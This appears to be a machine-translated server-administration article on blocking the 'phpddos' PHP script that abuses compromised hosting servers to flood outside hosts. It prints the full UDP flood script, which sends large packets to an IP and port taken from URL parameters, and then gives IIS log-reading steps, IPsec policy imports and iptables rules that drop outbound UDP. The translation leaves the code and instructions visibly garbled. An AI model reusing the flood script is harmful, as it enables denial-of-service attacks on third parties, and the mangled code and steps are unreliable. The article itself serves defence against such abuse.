Methods to prohibit outsourcing of servers

Let's take a look at Phpddos's code for outsourcing.

$packets = 0;
$ip = $_get[ip];
$rand = $_get[port];
Set_time_limit (0);
Ignore_user_abort (FALSE);
$exec _time = $_get[time];
$time = time ();
Print/"flooded: $ip on port $rand
/";
$max _time = $time + $exec _time;

For ($i =0 $i <65535; $i + +) {
$out. =/"x/";
}
while (1) {
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Fsockopen (/"udp://$ip/", $rand, $errno, $ERRSTR, 5);
if ($fp) {
Fwrite ($fp, $out);
Fclose ($FP);
}
}
echo/"Packet complete at/". Time (h:i:s/')./"With
$packets (/". Round ($packets *65)/1024, 2)./" MB packets averaging/".
Round ($packets/$exec _time, 2). /"packets/s//n/";
?>

Performance characteristics
As soon as you turn on IIS, the server runs out of bandwidth-----that is, the server continues to contract to others, this situation and by DDoS attack is different, DDoS is the server constantly receive a large number of packets.
Recent vulnerabilities due to DEDECMS have caused a large number of servers to appear this problem.
How to find these stations quickly?
You can open the log
C:/windows/system32/logfiles/httperr/httperr...log, open the file for today's time,
There's a record like this:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13-http/1.1 445&TIME=120 503 783 Disabled 30_freehost_1
Last three items 783 Disabled 30_freehost_1
783 is the ID of this station in IIS
30_freehost_1 is the same pool.

How to use:

Reference content
At the beginning--management tools--local Security policy--IP security Policy

"Action" in the menu--Import Policy

Ipset the "Extraterrestrial virtual host management platform"

Import and then assign it, you can also modify it yourself, adding some ports you want to block.

Extraterrestrial Virtual Host Management Platform IP policy 4.1----This is normally used.

Not to be attacked.-Shut down all UDP ports prohibit DNS2.0-----This is used under phpdos circumstances, some of the attacks can be used to solve

People who are not attacked.-Shut down all UDP ports prohibit DNS and collect 80 ports----This is used under phpdos conditions, some attacks can be used to solve

People who are not under attack do not use-prohibit external acquisition of 80-Port---------This is a large number of users external acquisition impact bandwidth of the use of

Note: If you are prompted to fail to start a service if you encounter a save policy, start the IPSec Services service within your service

For Linux system users The above approach is obviously not good, we provide professional Linux prevention methods

Iptables to prevent Php-ddos external contract

One, allow ports that require UDP services (such as DNS)

Iptables-i output-p UDP--dport 53-d 8.8.8.8-j ACCEPT

Second, prohibit the machine to send the UDP packet outside

Iptables-a output-p udp-j DROP

Green "53", for DNS required UDP port, the yellow "8.8.8.8" part of the DNS IP, according to your server settings, if you do not know your current server to use the DNS IP, you can execute the following command in SSH to obtain:

cat/etc/resolv.conf |grep nameserver |awk ' nr==1{print $} '